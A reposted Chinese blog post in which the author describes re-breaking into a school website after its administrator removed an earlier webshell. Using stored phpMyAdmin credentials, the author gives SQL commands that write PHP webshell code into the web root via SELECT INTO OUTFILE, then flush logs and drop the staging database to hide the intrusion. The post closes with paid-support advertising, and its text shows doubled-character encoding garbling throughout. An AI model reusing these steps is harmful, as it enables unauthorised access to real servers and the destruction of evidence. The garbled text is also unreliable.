利用phpMyAdmin拿webshell (轉(zhuǎn)自老康BLOG)
[重要通告]如您遇疑難雜癥,本站支持知識(shí)付費(fèi)業(yè)務(wù),掃右邊二維碼加博主微信,可節(jié)省您寶貴時(shí)間哦!
某個(gè)學(xué)校網(wǎng)站的shell被管理員del了,只好重新弄。
這次是利用phpMyAdmin(哈哈,帳號(hào)密碼我記下了!)
首先:
create database joyuan; /* 建立數(shù)據(jù)庫(kù)joyuan */
use joyuan; /* 連接joyuan數(shù)據(jù)庫(kù) */
create table shell(code text); /* 建立表shell字段code文本型數(shù)據(jù)text */
然后:
insert into shell(code) /* 插入數(shù)據(jù)到shell表中的code字段 */
values ('shell代碼'); /* 值為shell代碼 我用PHP一句話,看后面*/
select * into outfile '/home/www/htdocs/server.php' from shell;
/* 將shell表中的內(nèi)容輸出保存為文件(輸出到web目錄下,要不就無(wú)法訪問(wèn)shell了,可以直接輸出到phpmyadmin目錄下,不知道就phpinfo) */
flush logs /* 刪除日志 */
刪掉剛建的joyuan數(shù)據(jù)庫(kù),直接刪除或執(zhí)行SQL命令:drop database joyuan;
利用PHP一句話客戶端(http://linux.chaom.net/Shell.Htm)寫自己的shell
PHP一句話的服務(wù)端地址就是:http://xxx/phpmyadmin/server.php
搞定,嘿嘿。
PHP一句話服務(wù)端代碼:
問(wèn)題未解決?付費(fèi)解決問(wèn)題加Q或微信 2589053300 (即Q號(hào)又微信號(hào))右上方掃一掃可加博主微信
所寫所說(shuō),是心之所感,思之所悟,行之所得;文當(dāng)無(wú)敷衍,落筆求簡(jiǎn)潔。 以所舍,求所獲;有所依,方所成!